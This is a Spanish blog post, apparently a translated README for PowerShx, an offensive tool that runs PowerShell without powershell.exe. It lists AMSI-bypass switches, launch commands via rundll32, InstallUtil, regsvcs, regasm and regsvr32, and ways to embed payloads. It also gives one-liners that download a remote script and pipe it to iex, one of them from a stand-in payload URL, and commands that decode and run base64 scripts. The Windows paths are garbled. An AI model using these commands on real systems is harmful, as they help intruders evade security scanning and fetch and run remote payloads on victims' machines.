in

Ejecute Powershell sin restricciones de software




Ejecución de PowerShell no administrada mediante DLL o un ejecutable independiente.

Introducción

PowerShx es una reescritura y extensión del proyecto PowerShdll. PowerShx proporciona funcionalidad para omitir AMSI y ejecutar cmdlets PS.

caracteristicas

  • Ejecute Powershell con DLL utilizando rundll32.exe, installutil.exe, regsvcs.exe o regasm.exe, regsvr32.exe.
  • Ejecute Powershell sin powershell.exe o powershell_ise.exe
  • Funciones de derivación AMSI.
  • Ejecute scripts de Powershell directamente desde la línea de comandos o archivos de Powershell
  • Importe módulos de Powershell y ejecute cmdlets de Powershell.

propósito de uso

.dll versión

rundll32

rundll32 PowerShx.dll,main -e                           <PS script to run>
rundll32 PowerShx.dll,main -f <path> Run the script passed as argument
rundll32 PowerShx.dll,main -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w Start an interactive console in a new window
rundll32 PowerShx.dll,main -i Start an interactive console
rundll32 PowerShx.dll,main -s Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v Print Execution Output to the console

Alternativas (crédito a SubTee por estas técnicas):

1. 
x86 - C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
x64 - C:WindowsMicrosoft.NETFramework64v4.0.3031964InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
2.
x86 C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe PowerShx.dll
x64 C:WindowsMicrosoft.NETFramework64v4.0.30319regsvcs.exe PowerShx.dll
3.
x86 C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U PowerShx.dll
x64 C:WindowsMicrosoft.NETFramework64v4.0.30319regasm.exe /U PowerShx.dll
4.
regsvr32 /s /u PowerShx.dll -->Calls DllUnregisterServer
regsvr32 /s PowerShx.dll --> Calls DllRegisterServer

versión .exe

PowerShx.exe -i                          Start an interactive console
PowerShx.exe -e <PS script to run>
PowerShx.exe -f <path> Run the script passed as argument
PowerShx.exe -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet
PowerShx.exe -s Attempt to bypass AMSI.

Cargas útiles integradas

Las cargas útiles se pueden incrustar actualizando el diccionario de datos «Common.Payloads.PayloadDict» en el proyecto «Common» y llamándolo en el método PsSession.cs -> Handle (). Ejemplo: en el método Handle ():

private void Handle(Options options)
{
// Pre-execution before user script
_ps.Exe(Payloads.PayloadDict["amsi"]);
}

Ejemplos de

Ejecute un script codificado en base64

rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

Nota: Empire stagers se deben descifrar con [System.Text.Encoding]:: Unicode

Ejecute un script codificado en base64

rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

PowerShx.exe -e "IEX ((new-object net.webclient).downloadstring('http://192.168.100/payload-http'))"

requisitos

.NET 4

problemas conocidos

Algunos errores no parecen aparecer en la salida. Puede resultar confuso, ya que comandos como Import-Module no devuelven un error en caso de error. Asegúrese de escribir sus comandos correctamente.

En el modo DLL, el modo interactivo y la salida del comando dependen de la consola del proceso principal que está siendo secuestrado. Si el proceso principal no tiene una consola, use el modificador -n para ocultar la salida; de lo contrario, la aplicación fallará.

Debido a la forma en que Rundll32 maneja los argumentos, el uso de varios espacios entre modificadores y argumentos puede causar problemas. Varios espacios en los guiones están bien.



What do you think?

Written by Helen Lafayette

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

GIPHY App Key not set. Please check settings

Kit de phishing ‘TodayZoo’ elaborado a partir de otro malware

aDolus recauda $ 2.5 millones para asegurar la infraestructura crítica y hacer crecer su equipo de ventas y marketing